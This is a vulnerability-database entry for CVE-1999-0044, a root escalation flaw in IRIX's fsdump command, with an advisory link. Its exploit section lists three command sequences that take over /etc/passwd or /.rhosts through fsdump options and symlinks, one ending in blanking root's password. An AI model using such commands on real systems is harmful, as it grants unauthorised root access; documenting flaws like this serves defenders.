IRIX fsdump命令权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105269 漏洞类型 未知
发布时间 1996-12-03 更新时间 2005-05-02
CVE编号 CVE-1999-0044 CNNVD-ID CNNVD-199612-002
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19280
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199612-002
|漏洞详情
IRIX的fsdump命令存在漏洞,本地用户可以通过修改敏感文件获取根权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/355/info

A number of vulnerabilities exist in the fsdump program included with Silicon Graphics Inc's IRIX operating system. Each of these holes can be used to obtain root privlilege. 

Variant 1:
irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
(count to three, and hit ctrl-c)
irix% ls -la /etc/passwd
-rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd
irix% tail -8 /etc/passwd
nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

Tue Feb 25 06:23:48 PST 1997
Number of inodes total 208740; allocated 31259
Collecting garbage.
interrupted
irix% vi /etc/passwd # remove the encrypted root password
irix% chgrp sys /etc/passwd
irix% chown root /etc/passwd
irix% su -
irix#

Variant 2:

cp /etc/passwd /tmp/passwd
ln -s /etc/passwd rfd.lock
/var/rfindd/fsdump -F/tmp/rfd /
/var/rfindd/fsdump -L/etc/passwd -F/tmp/rfd /

Variant 3:
cd /tmp
ln -s /.rhosts fsdump.dir
/var/rfindd/fsdump -Fgimme /
ls -al /.rhosts
rm -f fsdump.dir fsdump.pag gimme
|参考资料

来源:SGI
名称:19970301-01-P
链接:ftp://patches.sgi.com/support/free/security/advisories/19970301-01-P